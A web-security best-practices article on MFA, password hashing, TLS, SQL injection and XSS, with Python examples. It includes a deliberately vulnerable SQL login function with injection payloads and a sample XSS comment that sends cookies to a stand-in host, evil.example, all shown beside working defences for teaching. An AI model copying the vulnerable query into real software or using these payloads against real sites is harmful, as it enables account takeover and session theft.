Data is widely acclaimed as the new oil. An increasing amount of data is being kept online, and many traditional assets are becoming digitized. It is more important than ever to adhere to security principles and employ current security techniques.
Cybercrime has been increasing drastically, and security administrators are overwhelmed by an onslaught of new and creative attacks. The Equifax breach is one of the latest in a long string of data breaches with extensive consequences.
One compromised account is often all it takes: once an attacker has a foothold, moving on to the rest of the network is usually the easy part. But by following the most important practices below, you can ensure that your users' data is as safe as it can be.
#1 – Enforce Multi-factor Authentication
Multi-factor authentication (MFA) is one of the best defenses available. Anybody logging on to a website or database must verify their identity by several (usually two or three) different means. These means, or factors, are generally classified into three groups:
- Knowledge factors: something the user knows, such as a password or PIN (a username is not a secret and does not count).
- Possession factors: something the user has, such as a hardware token, an authenticator app, or a registered device.
- Inherence factors: something the user is, i.e. biometrics (iris, fingerprint, voice, or face recognition).
Each factor adds an independent barrier an attacker must clear. The factors are not equal, though: one-time codes sent by SMS can be intercepted or phished, whereas hardware tokens that bind the login to the site's origin (FIDO2/WebAuthn security keys) resist phishing outright. Biometrics are hard to defeat with software alone, but they can be spoofed by presentation attacks (a photo, a recording, a lifted fingerprint), they cannot be changed once leaked, and the user behind them can be socially engineered like anyone else. No single factor should be relied on by itself.
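As an added example (not code from the original article), here is how a server checks a possession factor of the "authenticator app" kind: an RFC 4226 HOTP / RFC 6238 TOTP verifier. The secret, user name and time stamps are constructed for illustration; the first secret is the RFC's own test key, so the codes it produces can be checked against the published test vectors.

```python
# Added example: HOTP (RFC 4226) and TOTP (RFC 6238) verification as done on the server.
import hashlib
import hmac
import struct
import time
from typing import Dict, Optional


def hotp(secret: bytes, counter: int, digits: int = 6, algo: str = "sha1") -> str:
    """HMAC-based one-time password for a given counter value."""
    msg = struct.pack(">Q", counter)                      # 8-byte big-endian counter
    digest = hmac.new(secret, msg, algo).digest()
    offset = digest[-1] & 0x0F                            # dynamic truncation (RFC 4226 5.3)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, at: int, step: int = 30, digits: int = 6) -> str:
    """Time-based one-time password: HOTP over the number of elapsed time steps."""
    return hotp(secret, at // step, digits)


class TotpVerifier:
    """Server-side check with a small clock-drift window and replay protection.

    A code is accepted once only: the highest counter already accepted per user is
    remembered, so a phished or shoulder-surfed code cannot be reused while it is valid.
    """

    def __init__(self, step: int = 30, window: int = 1, digits: int = 6):
        self.step, self.window, self.digits = step, window, digits
        self.last_counter: Dict[str, int] = {}           # in-memory stand-in for a DB column

    def verify(self, user: str, secret: bytes, code: str, now: Optional[int] = None) -> bool:
        if len(code) != self.digits or not code.isdigit():
            return False
        now = int(time.time()) if now is None else now
        current = now // self.step
        for counter in range(current - self.window, current + self.window + 1):
            if counter <= self.last_counter.get(user, -1):
                continue                                  # already used or older: reject replay
            expected = hotp(secret, counter, self.digits)
            if hmac.compare_digest(expected, code):       # constant-time comparison
                self.last_counter[user] = counter
                return True
        return False


if __name__ == "__main__":
    SECRET = b"12345678901234567890"                      # RFC 4226 / 6238 test secret
    v = TotpVerifier()
    print("code at t=59:", totp(SECRET, 59))             # RFC 6238 vector: 287082
    print("first use accepted:", v.verify("alice", SECRET, totp(SECRET, 59), now=59))
    print("replay accepted:", v.verify("alice", SECRET, totp(SECRET, 59), now=59))
```

The drift window keeps a user whose phone clock is up to one step off from being locked out; widen it and the attacker's brute-force space grows with it, which is why the verifier should also sit behind the login throttling described under password management.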
#2 – Password Management
After MFA, password management is the next priority. A frightening number of users still choose the most basic and common passwords, such as "password" or "username123." Current guidance (NIST SP 800-63B) favours length over complexity: require at least 8 characters (longer passphrases are better), allow at least 64, accept any printable character including spaces, and drop forced composition rules and periodic rotation, which push users toward predictable patterns. Instead, screen every new password against a list of known breached and commonly used passwords and reject matches.
Additionally, limit failed login attempts (3 to 5 is typical) and then impose a waiting period that grows with each further failure, or require an additional verification step. Throttle per account and per source address rather than hard-locking accounts, or attackers can lock your users out on purpose. Encourage all employees and users to use a password manager. Managers are not infallible, but they are strongly recommended by security experts because they make a long, unique password per site practical.
Stored passwords must never be encrypted or kept in any reversible form: hash them with a dedicated, slow, salted password-hashing function such as Argon2id, scrypt or bcrypt. Validating a login then means recomputing the hash of the supplied password with the stored salt and comparing it, in constant time, against the stored value. The per-user random salt defeats precomputed (rainbow) tables and forces an attacker to crack each password separately; the function's tunable cost factor is what makes every guess expensive.
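The three points above (policy check, throttling, salted slow hashing) together, as an added example that is not from the original article. It uses only the Python standard library; the breached-password set is a tiny constructed stand-in for a real corpus, and the user names, passwords and time stamps are made up for illustration.

```python
# Added example: password policy, scrypt hashing with a random salt, and login throttling.
import base64
import hashlib
import hmac
import os
import time
from typing import Dict, List, Optional

MIN_LENGTH, MAX_LENGTH = 8, 64                  # length limits per NIST SP 800-63B, no composition rules
BREACHED = {"password", "123456", "qwerty", "username123", "letmein"}   # constructed sample list


def check_policy(password: str, username: str = "") -> List[str]:
    """Return the list of policy violations; an empty list means the password is acceptable."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if len(password) > MAX_LENGTH:
        problems.append(f"longer than {MAX_LENGTH} characters")
    if password.lower() in BREACHED:
        problems.append("appears in breached-password list")
    if username and username.lower() in password.lower():
        problems.append("contains the username")
    return problems


SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1    # cost, block size, parallelism (~16 MiB per hash)
MAXMEM = 64 * 1024 * 1024


def hash_password(password: str) -> str:
    """Derive with scrypt from a fresh 16-byte salt; store the parameters next to the hash."""
    salt = os.urandom(16)
    dk = hashlib.scrypt(password.encode(), salt=salt, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P,
                        maxmem=MAXMEM, dklen=32)
    return "$scrypt${}${}${}${}${}".format(SCRYPT_N, SCRYPT_R, SCRYPT_P,
                                           base64.b64encode(salt).decode(),
                                           base64.b64encode(dk).decode())


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and parameters, then compare in constant time."""
    _, algo, n, r, p, salt_b64, dk_b64 = stored.split("$")
    if algo != "scrypt":
        return False
    salt, dk = base64.b64decode(salt_b64), base64.b64decode(dk_b64)
    candidate = hashlib.scrypt(password.encode(), salt=salt, n=int(n), r=int(r), p=int(p),
                               maxmem=MAXMEM, dklen=len(dk))
    return hmac.compare_digest(candidate, dk)


class LoginThrottle:
    """After MAX_FAILURES failures the account waits BASE_DELAY seconds, doubling per extra failure."""
    MAX_FAILURES, BASE_DELAY = 5, 30

    def __init__(self):
        self.failures: Dict[str, int] = {}
        self.locked_until: Dict[str, float] = {}

    def is_locked(self, user: str, now: float) -> bool:
        return now < self.locked_until.get(user, 0.0)

    def record(self, user: str, ok: bool, now: float) -> None:
        if ok:
            self.failures.pop(user, None)
            return
        n = self.failures.get(user, 0) + 1
        self.failures[user] = n
        if n >= self.MAX_FAILURES:
            self.locked_until[user] = now + self.BASE_DELAY * 2 ** (n - self.MAX_FAILURES)


# Hash of a random value, used for unknown users so that response time does not reveal
# whether an account exists.
DUMMY_HASH = hash_password(os.urandom(16).hex())


def login(store: Dict[str, str], throttle: LoginThrottle, user: str, password: str,
          now: Optional[float] = None) -> bool:
    now = time.time() if now is None else now
    if throttle.is_locked(user, now):
        return False                            # throttled: do not even evaluate the password
    ok = verify_password(password, store.get(user, DUMMY_HASH))
    throttle.record(user, ok, now)
    return ok


if __name__ == "__main__":
    pw = "correct horse battery staple"         # constructed example password
    print("policy problems:", check_policy(pw, "alice"))
    store = {"alice": hash_password(pw)}
    print("stored record:", store["alice"])
    th = LoginThrottle()
    print("login ok:", login(store, th, "alice", pw))
    print("wrong pw:", login(store, th, "alice", "hunter2"))
```

The stored string carries its own cost parameters, so the cost can be raised later and old records rehashed at the user's next successful login without a migration step.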
#3 – Test, Test, Test
MFA and strong password management are essential to protect user data, but if you hold a large amount of sensitive data they are not enough on their own. The next step is penetration testing of the site or database itself.
Attackers are getting more creative and there are many ways to break into a website. A site should be tested regularly by a professional team that emulates what a real attacker would do; automated vulnerability scanners are a useful complement but catch only known issues and miss logic flaws. Any serious business with sensitive data should perform penetration tests every 3 to 6 months and after any major change, and fix the findings in order of severity.
#4 – Transport Layer Security (TLS, still widely called SSL)
Every site should serve all of its pages over HTTPS, not only those with forms. Chrome marks plain-HTTP sites as "Not secure", statistics show that 85% of US Chrome users will leave a non-HTTPS site, so its absence also seriously affects a company's web traffic, and HTTPS is a ranking signal in Google's search algorithm. Certificates range from free (Let's Encrypt) to around $200 a month; the encryption is the same whatever the price, which buys validation of the organisation behind the site rather than stronger security. Configure the server to redirect HTTP to HTTPS, send a Strict-Transport-Security header, and enable only TLS 1.2 and 1.3: the SSL protocol versions the name comes from are obsolete and insecure. In 2019, every site should have TLS for both security and business reasons.
#5 – Protect Against SQL Injection
SQL injection occurs when an application builds a query by concatenating untrusted input (a form field, a URL parameter, a cookie or a header) into the SQL text, so that the input is executed as part of the query instead of being treated as data. An attacker can then bypass a login, read or modify other users' records, or, in some databases, run commands on the server, and will usually see the results directly in the response. Prevent it by using parameterized queries (prepared statements) for every query, by validating against an allowlist anything that cannot be parameterized (such as a column name used for sorting), and by running the application with a least-privileged database account.
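The login query written both ways, as an added example that is not code from the original article. It uses an in-memory SQLite database with a constructed users table; the passwords are stored in clear text only to keep the injection visible (a real table holds the hashes from tip #2).

```python
# Added example: a login query vulnerable to SQL injection next to its parameterized form.
import sqlite3
from typing import List, Optional


def make_db() -> sqlite3.Connection:
    """Constructed sample database: two users, clear-text passwords for demonstration only."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    # DON'T: the input becomes part of the SQL text and can change what the query means.
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    # DO: placeholders; the driver passes the values separately, never as SQL text.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


ALLOWED_SORT = {"id", "username"}


def list_users_sorted(conn: sqlite3.Connection, column: str) -> List[str]:
    # Identifiers cannot be bound as parameters, so validate them against an allowlist.
    if column not in ALLOWED_SORT:
        raise ValueError(f"invalid sort column {column!r}")
    return [r[0] for r in conn.execute(f"SELECT username FROM users ORDER BY {column}")]


if __name__ == "__main__":
    db = make_db()
    # "admin' --" closes the string and comments out the password check.
    print("vulnerable, no password:", login_vulnerable(db, "admin' --", "anything"))
    # "' OR '1'='1" makes the WHERE clause true for every row.
    print("vulnerable, always-true:", login_vulnerable(db, "x", "' OR '1'='1"))
    print("safe, same inputs:", login_safe(db, "admin' --", "anything"),
          login_safe(db, "x", "' OR '1'='1"))
```

The same two payloads fail against the parameterized query because the quote characters arrive as data, so the database looks for a user literally named `admin' --`.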
#6 – Protect Against Cross Site Scripting (XSS)
Cross-site scripting is the browser-side counterpart of SQL injection: untrusted input (a comment, a display name, a search term) is written into a page without encoding, so an attacker's HTML and JavaScript run in every visitor's browser with that visitor's session and cookies. Prevent it by encoding output for the context it lands in (HTML body, attribute, JavaScript, URL) rather than trying to filter input, by using a templating engine that escapes by default, and by sending a Content-Security-Policy header as a second line of defense.
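An added example (not from the original article) of the same comment rendered with and without output encoding, plus a link check, because escaping alone does not make a `javascript:` URL safe in an `href`. The comment text and names are constructed.

```python
# Added example: HTML output encoding against stored/reflected XSS, and href scheme checking.
import html
import urllib.parse

# Constructed attacker comment: exfiltrates the viewer's cookie if rendered unescaped.
EVIL_COMMENT = '<script>document.location="https://evil.example/?c="+document.cookie</script>'


def render_vulnerable(name: str, comment: str) -> str:
    # DON'T: untrusted text dropped straight into the markup.
    return f"<p><b>{name}</b> wrote: {comment}</p>"


def render_safe(name: str, comment: str) -> str:
    # DO: encode for the HTML body context; <, >, &, " and ' become entities.
    return f"<p><b>{html.escape(name)}</b> wrote: {html.escape(comment)}</p>"


def safe_href(url: str) -> str:
    """Allow only http(s) links; return a harmless '#' for javascript:, data: and the like."""
    if urllib.parse.urlparse(url).scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)       # quote=True also encodes " and ' for attributes


def render_link(url: str, label: str) -> str:
    return f'<a href="{safe_href(url)}">{html.escape(label)}</a>'


if __name__ == "__main__":
    print(render_vulnerable("Mallory", EVIL_COMMENT))
    print(render_safe("Mallory", EVIL_COMMENT))
    print(render_link("javascript:alert(document.cookie)", "click me"))
    print(render_link('https://example.com/?a=1&b="2"', "ok link"))
```

Context matters: `html.escape` is right for text nodes and quoted attributes, but a value placed inside a `<script>` block or a CSS property needs that context's own encoding, which is why escape-by-default templating is the practical rule.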
#7 – Social Engineering
Social engineering remains one of the most common attack vectors: instead of defeating the technology, attackers talk users or employees into giving information away. The most common form is phishing. For example, an employee receives an email with a link to a site that looks like the official login page but is a fake that captures the username and password for the real one. Criminals also impersonate companies, colleagues or IT staff by email or phone and convince people to divulge sensitive information. Make sure all employees and users know these tricks, report suspicious messages, and verify unusual requests through a second channel. Phishing works time and time again despite repeated warnings never to give credentials away by email or telephone, which is one more reason to prefer phishing-resistant MFA: a captured password is then not enough on its own.
#8 – Additional Tips
- Update all software – Make sure that the operating system, web server, frameworks, plugins, extensions, and applications are updated to the latest version, and subscribe to the security announcements for each. Attackers look for known vulnerabilities in older versions.
- Use a CDN – A content delivery network (CDN) with DDoS protection absorbs the traffic of a distributed denial of service (DDoS) attack, which floods the server with requests, because its capacity scales far beyond a single origin. It does not help against attacks aimed straight at the origin, so configure the origin to accept connections only from the CDN.
- Restrict file uploads – Do not accept file uploads unless the application genuinely needs them. Any uploaded file can carry malicious code that runs if the server (or a visitor's browser) ever executes it. If uploads are required, allow only the file types you need, check the content rather than just the extension, give each file a server-chosen random name, store it outside the web root without execute permission, and serve it from a separate domain.
There are a number of methods that can be used to protect user data. The most important are to enforce MFA and strong password handling for all users; that alone stops most opportunistic attacks. If you hold sensitive data, be sure to conduct penetration tests regularly to examine how secure your site actually is.
While MFA and password management are essential, your site could still suffer from a basic flaw that specialists will pick up very quickly. No site or database is 100% secure and technology is constantly evolving, so individuals and businesses have to stay up to date with current security practices.